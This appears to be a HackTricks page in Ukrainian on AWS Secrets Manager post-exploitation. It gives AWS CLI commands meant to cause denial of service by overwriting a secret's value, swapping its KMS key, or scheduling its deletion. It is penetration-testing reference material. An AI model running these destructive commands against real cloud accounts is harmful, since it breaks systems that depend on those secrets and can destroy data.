AWS - Secrets Manager Post Exploitation

Підтримайте HackTricks

Менеджер секретів

Для отримання додаткової інформації перегляньте:

AWS - Secrets Manager Enum

Читання секретів

Сами секрети є чутливою інформацією, перевірте сторінку привілеїв, щоб дізнатися, як їх читати.

DoS Зміна значення секрету

Змінивши значення секрету, ви можете здійснити DoS всієї системи, яка залежить від цього значення.

Зверніть увагу, що попередні значення також зберігаються, тому легко повернутися до попереднього значення.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

Зміна ключа KMS для DoS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Видалення секрету

Мінімальна кількість днів для видалення секрету - 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Підтримайте HackTricks

Last updated